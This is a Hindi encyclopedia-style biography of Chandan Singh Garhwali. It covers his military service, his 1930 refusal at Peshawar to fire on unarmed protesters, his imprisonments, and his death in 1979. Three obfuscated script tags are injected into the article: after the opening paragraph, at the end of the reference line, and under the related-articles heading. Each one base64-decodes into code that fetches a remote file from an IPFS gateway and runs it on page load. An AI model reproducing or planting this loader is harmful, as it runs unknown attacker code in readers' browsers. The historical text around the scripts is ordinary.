चन्दन सिंह गढ़वाली

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 11:24, 18 अगस्त 2013 का अवतरण (''''चन्दन सिंह गढ़वाली''' (जन्म- 1891 ई., पौड़ी गढ़वाल, [[उत...' के साथ नया पन्ना बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

चन्दन सिंह गढ़वाली (जन्म- 1891 ई., पौड़ी गढ़वाल, उत्तराखण्ड; मृत्यु- 1 अक्टूबर, 1979) भारत के क्रांतिकारियों में से एक थे। चन्दन सिंह 'गढ़वाल रेजीमेंट' के प्रमुख थे। 'सविनय अवज्ञा आन्दोलन' के दौरान जब उत्तर-पश्चिम सीमा प्रान्त में अब्दुल गफ़्फ़ार ख़ाँ के नेतृत्व में ब्रिटिश विरोधी संघर्ष ज़ोरों पर था, तो उसके दमन हेतु ब्रिटिश सरकार ने चन्दन सिंह की 'गढ़वाल रेजीमेंट' को नियुक्त किया। आन्दोलन के दौरान जब अंग्रेज़ अधिकारियों ने अहिंसक प्रदर्शन कर रहे आन्दोलनकारियों पर गोलियाँ चलाने की आज्ञा दी, तब चन्दन सिंह ने गोली चलाने से इंकार कर दिया। इस पर उन्हें पदच्युत करके दण्डित किया गया।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

जन्म तथा शिक्षा

चन्दन सिंह का जन्म उत्तराखण्ड के पौड़ी गढ़वाल ज़िले में पट्टी चौथन के गाँव रोनशेहरा में सन 1891 में हुआ था। इनके घर की आर्थिक स्थिति अच्छी नहीं थी। गरीबी के कारण वे प्राथमिक स्तर से अधिक शिक्षा ग्रहण नहीं कर पाये थे। सन 1914 में चन्दन सिंह लन्डसडाऊन्स में स्थित गढ़वाली रेजीमेन्ट केन्द्र में भर्ती हो गए।[1]

राष्ट्रीयता का भावना

चन्दन सिंह ने मेसोपोटामिया और फ़्राँस में कार्यवाही देखी। उन्होंने 1921 तक उत्तर पश्चिमी प्रान्त की देख-रेख की। चन्दन सिंह में राष्ट्रीय भावना भी कूट-कूट कर भरी थी। उनकी इस देश भक्ति का प्रमाण 1930 के 'नमक सत्याग्रह आन्दोलन' में देखने को मिला। चन्दन सिंह की बटालिन '218वीं रायल गढ़वाल राइफल्स' पेशावर पर तैनात कर दी गयी थी। 23 अप्रैल को कैप्टन रिकेट अपने 72 सैनिकों के साथ पेशावर के किस्सा खान क्षेत्र तक फैल गये। निहत्थे पठानों की दुकानों को घेर लिया गया। कैप्टेन रिकेट ने भीड़ को तितर-बितर करने का आदेश दिया और बाज़ार खाली करा दिया। लेकिन उसके इस आदेश पर अमल नहीं किया गया।

जेल यात्रा

कैप्टन रिकेट ने गढ़वालियों पर गोली चलाने का आदेश दिया। चन्दन सिंह ने रिकेट के इस आदेश पर दखल दिया और चिल्लाकर कहा कि- "गढ़वाली गोली नहीं चलाएँगे"। गढ़वालियों ने चन्दन सिंह के आदेश का पालन किया, जिस पर उन्हें गिरफ्तार कर लिया गया। चन्दन सिंह को आजीवन कारावास की सजा सुनाई गई। सजा पूरी करने के बाद चन्दन सिंह को 1941 में रिहा कर दिया गया उन्होंने 1942 के 'भारत छोड़ो आन्दोलन' में हिस्सा लिया। आन्दोलन में सक्रियता के कारण उन्हें गिरफ्तार कर जेल भेज दिया गया।[1]

निधन

भारत की स्वतन्त्रता के पश्चात चन्दन सिंह कम्युनिस्ट बन गये। उन्हें 1948 में जेल हुई। अपनी रिहाई के पश्चात उन्होंने अपना सम्पूर्ण जीवन आम जनता की सेवा में बिता दिया। वे 1 अक्टूबर, 1979 को 88 वर्ष की अवस्था में इस दुनिया से चले गये।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 उत्तर प्रदेश के क्रांतिकारी (हिन्दी)। । अभिगमन तिथि: 18 अगस्त, 2013।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>